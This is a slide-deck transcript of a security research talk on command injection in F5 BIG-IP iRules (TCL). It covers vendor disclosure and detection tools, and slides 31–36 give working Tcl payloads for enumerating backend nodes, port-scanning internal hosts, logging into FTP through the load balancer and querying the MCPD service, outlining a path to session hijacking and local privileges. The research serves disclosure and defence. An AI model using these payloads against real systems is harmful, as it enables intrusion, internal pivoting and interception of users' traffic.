command injection in
play

COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS A story about how - PowerPoint PPT Presentation

May 15, 2023 •191 likes •679 views

COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS A story about how TCL interpretation works in F5 iRules and how it can be detected or exploited WHOAMI AND THANKS Big thanks to my fellow researchers Jesper Blomstrm Pasi Saarinen

  1. COMMAND INJECTION IN IRULES LOADBALANCER SCRIPTS A story about how TCL interpretation works in F5 iRules and how it can be detected or exploited

  2. WHOAMI AND THANKS Big thanks to my fellow researchers ▪ Jesper Blomström ▪ Pasi Saarinen ▪ William Söderberg ▪ Olle Segerdahl Twitter @kuggofficial Big thanks to David and Aaron at F5 SIRT for a good response https://support.f5.com/csp/article/K15650046

  3. F-SECURE IS ONE OF THE LEADING CYBER SECURITY CONSUL TING PROVIDERS GLOBALL Y CAPABILITY ACCREDITATIONS 250+ 12 Technical Internationally consultants recognised TECHNICAL SECURITY SERVICES Incident Hardware Security Red teaming Management & security assessments Forensics assessments THOUGHT RISK & SECURITY MANAGEMENT LEADERSHIP CLIENTS Development Coaching & 300+ Audit & analysis programs exercises 250+ CYBER INTELLIGENCE Publications & Clients research released Intelligence Intelligence services platform annually

  4. LOAD BALANCERS

  5. THE F5 PRODUCTSI WILLT ALK ABOUT ▪ Can store and handle multiple sessions for backend Internet servers ▪ Customers write their own iRules to define the load balancer behaviour ▪ https://devcentral.f5.com is used as a ” stackoverflow for iRules ” TLS BIG-IP Load balancer ▪ Application fluency for all major protocols. ▪ Highly programmable through iRules, iRules LX and Traffic Policies ▪ Deployable as software and hardware ▪ Scalable to Tb/s of performance and highly available for both data and control plane HTTP Server 1 HTTP Server 2 ▪ WAF functionality

  6. CACHING IRULEEXAMPLE Backend Browser Loadbalancer webservers GET /favicon.ico iRule HTTP 200 OK

  7. FORWARDINGEXAMPLE Backend Browser Loadbalancer webservers GET /index.html GET /index.html iRule HTTP 200 OK HTTP 200 OK

  8. THE IRULE LANGUAGE ▪ A fork of TCL 8.4 ▪ New features in TCL >8.4 are not introduced in iRule ▪ iRule has introduced a group of simplifications and exceptions to TCL ▪ Return oriented programming (with optional exception handling)

  9. TCL/ IRULEBASICS ▪ iRules determine where a given HTTP request is forwarded to, based on a programmed logic ▪ The HTTP request header and body is parsed by the F5 iRule engine ▪ The system admnistrator writes F5 iRule code to handle requests ▪ Example ” catch- all” redirect iRule: when HTTP_REQUEST { HTTP::redirect ”/helloworld.html” }

  10. HOWTO SPOT THESE LOADBALANCERSIN THE WILD HTTP header include ▪ Server: BigIP Found in redirects Found in favicon.ico responses HTTP/1.0 302 Found Location: /helloworld.html Server: BigIP Connection: close Content-Type: Text/html Content-Length: 0

  12. TCLSUPPORTS ARGUMENT SUBSTITUTION

  13. COMMANDARGUMENTS ▪ An argument is evaluated by breaking down words and substituting its meaning depending on the string enclosure 1. command ”$arg1” ”$arg2” # Quoted arguments 2. command [$arg1] [$arg2] # Bracketed arguments 3. command {$arg1} {$arg2} # Braced arguments 4. command $arg1 $arg2 # Unquoted arguments

  14. QUOTEDEV ALUA TION AND COMMAND SUBSTITUTION Inside double quotes (”): ” Command substitution, variable substitution, and backslash substitution are performed on the characters between the quotes …” Inside brackets []: ”If a word contains an open bracket (“ [ ”) then TCL performs command substitution.” ▪ Like backticks ` in /bin/sh

  15. THISIS A COMMAND INJECTION Bart : Is Al there? Moe : Al? Bart : Yeah, Al. Last name Caholic? Moe : Hold on, I'll check. Phone call for Al... Al Caholic. Is there an Al Caholic here? (The guys in the pub cheer.) 15

  16. ARGS AND BODYUNQUOTEDCOMMAND SUBSTITUTION The body part of command invocation is a list of commands to execute if a condition is met command ?arg? ?body? 1. after 1 $body 2. while 1 $body 3. if 1 $body 4. switch 1 1 $body In these cases the value of $body will be command substituted regardless of quote unless braces are used

  17. PRIOR ART : COMMANDINJECTIONIN TCL8.4 TCL will expand the value of a command before assignment if it is put inside quotes https://wiki.tcl-lang.org/page/Injection+Attack set variable {This is a string} catch "puts $variable" When double quotes are used, TCL will substitute the content of the variables and commands Try: set variable {[error PWNED!]} When the contents of $variable is substituted by TCL it will be passed as [error PWNED!] to catch and executed. This is called double substitution

  18. BREAKINGDOWN EXECUTION 1. The word catch is resolved as a catch ”puts $ variable ” command with a ?body? argument 2. Arguments are evaluated by the catch puts [error PWNED!] TCL interpreter according to the dodecalogue, including expansion of [ ] ” ”{ } 3. Any code within arguments error PWNED! starting with [ will be executed by catch

  19. LIST OFBUIL T-IN COMMANDSTHA TCANPERFORM COMMANDEV ALUA TION ▪ after ▪ proc ▪ subst ▪ catch ▪ cpu ▪ time ▪ eval ▪ string match ▪ try ▪ expr ▪ interp ▪ uplevel ▪ for ▪ namespace eval ▪ while ▪ foreach ▪ namespace inscope ▪ trace ▪ history ▪ source ▪ list ▪ if ▪ switch

  20. DIRECTEV ALUA TION: EV AL, SUBSTOR EXPR eval , a built- expr , a built- subst - Perform in Tcl command, in Tcl command, backslash, command, interprets its arguments interprets its arguments and variable as a script, which it then as a mathematical substitutions. evaluates. expression, which it then subst ? - evaluates. eval arg ? arg ... ? nobackslashes ? ? - expr arg ? arg nocommands ? ? - ... ? novariables ? String

  21. IRULEBASEDON HSSR Backend Browser Loadbalancer webservers GET /index.html GET /index.html iRule HTTP 200 OK when HTTP_REQUEST { if {[HTTP::uri] starts_with "/index.html"} { HTTP 200 OK set lang [HTTP::header {Accept-Language}] set uri http://$lang.cdn.example.com/index.html set status [call /Common/HSSR::http_req -uri $uri] } }

  22. HOWHSSR USESOUR $URI

  23. EXPLOIT A TION 1. Identify an input field that is command substituted in iRule Input Tcl strings in fields and header names Look for indications that the code was executed 2. Test injection location using the info command 3. Identify external resources to pivot to permanent access

  24. DEMO TIME

  25. T AKING IT FURTHER How do we get persistent access?

  26. ▪ A session table is a distributed and replicated key value store GAINING ▪ Commonly used to store cookie values PERMANENT Notably used to avoid paying for the ACCESS USING APM module ”TABLE” ▪ Magically synchronized between instances using load balancing Can be used to pivot access on multiple instances

  27. ▪ With command injection it’s possible to overwrite any table value ▪ table set ▪ table lookup HACKINGTHE ▪ table add SESSION TABLE ▪ table replace ▪ Overwriting another (or all) user session enable specifically executing code for a target user ▪ Possible to sniff all http(s) traffic for any authenticated user

  28. TABLE DEMO: HOSTEDMITM

  29. A LOOK A T THE CODEIN THE BIG-IP EDITOR

  30. ▪ Scan internal network POST ▪ Scan localhost EXPLOITATION ▪ Attack internal resources using POSSIBILITIES the BIG-IP F5 as a pivot

  31. P A YLOAD1 Exposing the pool (backend) servers active_nodes -list [LB::server pool]

  32. PORTSCANTHE POOL SERVERS foreach p {21 80 135 389 443 445}{catch {set c [connect 192.168.200.5:$p];append r $p "\topen\n";close $c}};TCP::respond $r

  33. LOGGINGIN TO THE FTP SERVICE catch {set c [connect 192.168.200.5:21]; recv -timeout 200 $c d; recv -timeout 200 $c d; send -timeout 200 $c "USER anonymous\r"; recv -timeout 200 $c d; send -timeout 200 $c "PASS a@a.com\r"; recv -timeout 200 $c d;}; close $c;TCP::respond $d

  34. A TT ACK CHAIN Protected Browser Loadbalancer webservers GET / index.html FTP request iRule FTP response 230 User logged in.

  35. P A YLOAD2 PORTSCANLOCALHOST

  36. P A YLOAD3 QUERY ALL MCPDSYSTEM MODULE set c [connect 127.0.0.1:6666];send $c {%00%00%00%16%00%00%00%3f%00%00%00%00%00%00%00%02%0b%65%00%0d%00%00%00%0c%21%e0%00 %0d%00%00%00%02%00%00%00%00%00%00};recv -timeout 10000 $c d;TCP::respond $d

  37. MCPD EXPLANA TION %00%00%00%16 SIZE %00%00%00%3f SEQUENCE %00%00%00%00 REQUEST-ID %00%00%00%02 FLAG %0b%65 KEY (Query All) %00%0d TYPE %00%00%00%0c ATTRIBUTE SIZE %21%e0 ATTRIBUTE NAME (System Module) %00%0d%00%00%00%02%00%00%00%00 (Attribute data) %00%00 END OF MESSAGE

  38. LIST USERSAND PRIVILEGES

  39. LIST LOCALTMSHSHELLCOMMANDS (BEYONDIRULE)

  40. A TT ACK CHAIN 1. iRule injection access 2. Query MCPD 3. Mcpd response 4. Execute MCPD tmsh command with Tcl injection … 5. 6. Local privilegies

  41. DETECTION

  42. ▪ Automated tool to find quoted and unquoted arguments SCANNING FOR ▪ It’s unmaintained Rust so I had to COMMAND fix it INJECTION ▪ Finds 80% of known injection vulnerabilities WITH TCLSCAN ▪ Get the code: https://github.com/kugg/tclscan

  43. AUTOMA TEDTESTINGUSINGIRULEDETECTOR.PY ▪ Automated iRule injection detector scanner for Burp Suite ▪ The tool will substitute every available input field with a Tcl injection and measure the result ▪ Download iruledetector.py in the bapp-store

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application

A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application into executing commands or code embedded in data Data and code mixing! Often injected into interpreters SQL, PHP, Python, JavaScript, LDAP,

377 views • 14 slides
VOTD: OS Command Injection Engineering Secure Software Last Revised: September 17, 2020

VOTD: OS Command Injection Engineering Secure Software Last Revised: September 17, 2020

VOTD: OS Command Injection Engineering Secure Software Last Revised: September 17, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is OS Command Injection Executing arbitrary commands on the host OS via a vulnerable

272 views • 8 slides
A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a

A1 (Part 2): Injection SQL Injection SQL injection is prevalent SQL injection is impactful Why a password manager is a good idea! SQL injection is ironic SQL injection is funny Overviewtrated Account Summary Account: Account: "SELECT

445 views • 32 slides
Web Security 1 last time: command injection placing user input in more complicated language SQL

Web Security 1 last time: command injection placing user input in more complicated language SQL

Web Security 1 last time: command injection placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string constant) defenses: better APIs:

630 views • 50 slides
Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection

Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection

Security Psychology Topics Weve Covered Ethics XSS CSRF SQL injection Passwords Command injection Scanning Malware Most of these attacks are enabled by social engineering. Todays Class Pretexting

516 views • 26 slides
5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring

5.2) Injections (part 2) Shell Injection, XML Injection, LDAP injection Emmanuel Benoist Spring Term 2016 Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 1 Table of Contents Injection in PHP

995 views • 73 slides
A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks

A1 (Part 3): Injection Blind SQL Injection Blind SQL Injection SQL injectio ion that tricks ks databases into reveal l information by way of the success or failure of injected querie ies Analogous example le: Login prompt that stops ps

602 views • 14 slides
Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

Injection mismatch type of injection mismatch will lead to an emittance blow-up. Off axis

Injection mismatch: As a rule, proton/ion accelerators need their full aperture at injection, thus avoiding mismatch allows a beam of larger normalized emittance * and containing more Protons. In proton/ion ring accelerators any Injection

454 views • 4 slides
INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

TECHNOLOGY APPLICATIONS FOR HYDRO ISOLATION AND REPAIR OF UNDERGROUND FACILITIES INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible mass of mineral origin, for both dry and wet surfaces solvent-free,

466 views • 29 slides
INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible

TECHNOLOGY APPLICATIONS FOR HYDRO ISOLATION AND REPAIR OF UNDERGROUND FACILITIES INJECTION GEL www.eurastechnology.com WHAT IS INJECTION GEL? An injectable gel is a flexible mass of mineral origin, for both dry and wet surfaces solvent-free,

487 views • 21 slides
SQL Injection Attack 1 Brief Tutorial of SQL MySQL: an open-source relational database

SQL Injection Attack 1 Brief Tutorial of SQL MySQL: an open-source relational database

SQL Injection Attack 1 Brief Tutorial of SQL MySQL: an open-source relational database management system Log in to MySQL Create a Database : SHOW DATABSES command: list existing databases. Create a new database called

521 views • 30 slides
Injection Safety Every Provider s Responsibility Outline Safe Injection

Injection Safety Every Provider s Responsibility Outline Safe Injection

Injection Safety Every Provider s Responsibility Outline Safe Injection Practices The ONE and ONLY Campaign Outbreak History Mistaken Beliefs A Call to Action Resources and Information

591 views • 20 slides
CS-527 Software Security Web security Asst. Prof. Mathias Payer Department of Computer Science

CS-527 Software Security Web security Asst. Prof. Mathias Payer Department of Computer Science

CS-527 Software Security Web security Asst. Prof. Mathias Payer Department of Computer Science Purdue University TA: Kyriakos Ispoglou https://nebelwelt.net/teaching/17-527-SoftSec/ Spring 2017 Command injection Table of Contents Command

705 views • 23 slides
Command command / kmand / noun 1. an instruction or signal that causes a computer to

Command command / kmand / noun 1. an instruction or signal that causes a computer to

Command command / kmand / noun 1. an instruction or signal that causes a computer to perform one of its basic function Command Intent Encapsulate a request as an object , thereby letting you parameterize clients with different request,

297 views • 16 slides
HQ Air Force Space Command Air Force Space Command Lead USAF Major Command for Cyberspace

HQ Air Force Space Command Air Force Space Command Lead USAF Major Command for Cyberspace

Leveraging IT for Enhanced Operational Effectiveness in Cyberspace 24 May 11 Col Kim Crider Directorate of Communications & Information HQ Air Force Space Command Air Force Space Command Lead USAF Major Command for Cyberspace Core

353 views • 14 slides
Reaction Injection Molding (RIM)- Low Quantity Injection Molding for the Life Sciences Industry

Reaction Injection Molding (RIM)- Low Quantity Injection Molding for the Life Sciences Industry

Reaction Injection Molding (RIM)- Low Quantity Injection Molding for the Life Sciences Industry Presented by: Ken Schweitz, President and Doug Culbertson, VP Business Development of Premold Corp Section I. Advantages of RIM Economical

441 views • 29 slides
FUZZIFICATION : Anti-Fuzzing Techniques Jinho Jung , Hong Hu, David Solodukhin, Daniel Pagan, Kyu

FUZZIFICATION : Anti-Fuzzing Techniques Jinho Jung , Hong Hu, David Solodukhin, Daniel Pagan, Kyu

FUZZIFICATION : Anti-Fuzzing Techniques Jinho Jung , Hong Hu, David Solodukhin, Daniel Pagan, Kyu Hyung Lee*, Taesoo Kim * 1 Fuzzing Discovers Many Vulnerabilities 2 Fuzzing Discovers Many Vulnerabilities 3 Testers Find Bugs with Fuzzing

1.13k views • 65 slides
A Bruhat type decomposition of the set of conditioned invariant subspaces Jochen Trumpf

A Bruhat type decomposition of the set of conditioned invariant subspaces Jochen Trumpf

A Bruhat type decomposition of the set of conditioned invariant subspaces Jochen Trumpf Jochen.Trumpf@anu.edu.au Department of Systems Engineering Research School of Information Sciences and Engineering The Australian National University and

642 views • 45 slides
DLL Injection CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 18.07.2020

DLL Injection CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 18.07.2020

DLL Injection CONTACT@ADAMFURMANEK.PL HTTP://BLOG.ADAMFURMANEK.PL FURMANEKADAM 1 18.07.2020 DLL INJECTION - ADAM FURMANEK About me Experienced with backend, frontend, mobile, desktop, ML, databases. Blogger, public speaker. Author of .NET

655 views • 36 slides
File Injection for Virtual Machine Boot Mechanisms Till Mller advised by Johannes Naab Monday 4

File Injection for Virtual Machine Boot Mechanisms Till Mller advised by Johannes Naab Monday 4

Chair of Network Architectures and Services Department of Informatics Technical University of Munich File Injection for Virtual Machine Boot Mechanisms Till Mller advised by Johannes Naab Monday 4 th November, 2019 Block Seminar: Innovative

453 views • 16 slides
Static vs. Dynamic Analysis Static analysis: analyze source code or byte code Imprecise

Static vs. Dynamic Analysis Static analysis: analyze source code or byte code Imprecise

I NTELLI D ROID A Targeted Input Generator for the Dynamic Analysis of Android Malware Michelle Y. Wong and David Lie University of Toronto Department of Electrical and Computer Engineering NDSS Symposium 2016 ! ! ! B ACKGROUND Static vs.

1.02k views • 32 slides
The Impact of Attack Profile Classification on the Robustness of Collaborative Recommendation *

The Impact of Attack Profile Classification on the Robustness of Collaborative Recommendation *

Center for W eb I ntelligence Center for W eb I ntelligence School of CTI, DePaul University Chicago, Illinois, USA The Impact of Attack Profile Classification on the Robustness of Collaborative Recommendation * Chad Williams, Runa Bhaumik,

380 views • 24 slides
Understanding and Automatically Preventing Injection Attacks on Node.js Michael Pradel TU

Understanding and Automatically Preventing Injection Attacks on Node.js Michael Pradel TU

Understanding and Automatically Preventing Injection Attacks on Node.js Michael Pradel TU Darmstadt Joint work with Cristian Staicu (TU Darmstadt) and Ben Livshits (Microsoft Research, Redmond) 1 Why JavaScript? Relevant and challenging

520 views • 48 slides
End-to-end Injection Safety at Scale Mike Samuel, Google Security Engineering March 2019 2019 |

End-to-end Injection Safety at Scale Mike Samuel, Google Security Engineering March 2019 2019 |

End-to-end Injection Safety at Scale Mike Samuel, Google Security Engineering March 2019 2019 | About me Security engineer @ Google Hacks libraries, tools, languages TC39 member ( JavaScript language committee ) Editor of "A Roadmap

407 views • 29 slides

More recommend